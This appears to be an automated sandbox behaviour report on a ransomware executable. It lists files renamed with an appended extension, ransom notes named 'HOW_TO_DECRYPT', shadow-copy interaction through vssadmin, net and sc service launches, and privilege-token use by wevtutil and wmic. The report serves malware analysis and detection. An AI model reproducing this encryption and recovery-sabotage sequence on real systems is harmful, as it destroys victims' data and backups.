File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\ja-JP\gadget.xml C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\en-US\TipBand.dll.mui C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-tabcontrol.xml.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_w4usS39bhb80.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\es-ES\js\cpu.js C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0185828.WMF.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_rWaJGiWWjcg0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN102.XML.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_h83c3O6PG8M0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes.nl_zh_4.4.0.v20140623020002.jar.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_0a98_q_m5no0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Ust-Nera.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_S-eLkrsXgO40.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099180.WMF.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_0BI2aEwimYE0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR45B.GIF.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD__L46H9-UUHo0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\vyS2_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\vyS2_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Inuvik.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_kUc8uqKF5kk0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00170_.GIF.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_nXt1x6BfYng0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN01184_.WMF.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_holcTDQzaM00.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313974.JPG.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_6GnVp6OOZFk0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsPreviewTemplate.html.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_r9-icbW0TJc0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\45.png C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.common_5.5.0.165303.jar.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_9R0oDF2h-tQ0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\smtp.jar.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_EvBr5hhVyxA0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00276_.WMF.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD__mir0upb2gE0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\INFOPATH_COL.HXT.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_6fUlYXcAmKg0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ru.txt.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_TktKl8C6PxM0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Monet.jpg C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Yekaterinburg.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_zYF28hI0bAQ0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.contenttype_3.4.200.v20140207-1251.jar.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_VJFJ5A0BKrQ0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107146.WMF.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_IHJMT039lf80.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0182689.JPG.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_RwqhBFuikqU0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TR00095_.WMF.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_uO5JglnBLp40.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\flyout.html C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\vyS2_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding.nl_zh_4.4.0.v20140623020002.jar.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_r8vLw2wF_7Q0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Apia.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_JL8x9Y7ekRU0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099203.GIF.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_5EQaLs5_ABA0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02748G.GIF.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_rIFHZzQ27XY0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\EXCEL.DEV_F_COL.HXK.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_YT3k6pJFONI0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectToolsetIconImages.jpg.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_2XzOMFaj23g0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-first-quarter.png C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\AddSearch.m3u.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_DYMiD92PqR00.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\System\msadc\adcjavas.inc C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Noumea.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_4dNEMOMWQh80.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_iRZZndEEMEE0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02228_.WMF.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_UBjnf_Rty000.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\es-ES\gadget.xml C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\notepad.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1540 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1540 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1540 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1720 wrote to memory of 652 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1720 wrote to memory of 652 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1720 wrote to memory of 652 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1540 wrote to memory of 560 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1540 wrote to memory of 560 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1540 wrote to memory of 560 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 560 wrote to memory of 708 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 560 wrote to memory of 708 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 560 wrote to memory of 708 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1540 wrote to memory of 632 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1540 wrote to memory of 632 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1540 wrote to memory of 632 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 632 wrote to memory of 816 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 632 wrote to memory of 816 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 632 wrote to memory of 816 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1540 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1540 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1540 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1984 wrote to memory of 1120 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1984 wrote to memory of 1120 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1984 wrote to memory of 1120 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1540 wrote to memory of 384 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1540 wrote to memory of 384 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1540 wrote to memory of 384 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 384 wrote to memory of 960 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 384 wrote to memory of 960 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 384 wrote to memory of 960 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1540 wrote to memory of 1468 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1540 wrote to memory of 1468 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1540 wrote to memory of 1468 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1468 wrote to memory of 1116 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1468 wrote to memory of 1116 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1468 wrote to memory of 1116 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1540 wrote to memory of 820 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1540 wrote to memory of 820 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1540 wrote to memory of 820 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 820 wrote to memory of 1280 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 820 wrote to memory of 1280 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 820 wrote to memory of 1280 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1540 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1540 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1540 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1536 wrote to memory of 1084 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1536 wrote to memory of 1084 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1536 wrote to memory of 1084 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1540 wrote to memory of 1108 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1540 wrote to memory of 1108 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1540 wrote to memory of 1108 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1540 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1540 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1540 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1540 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1540 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1540 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1540 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1540 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1540 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1540 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1540 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1540 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
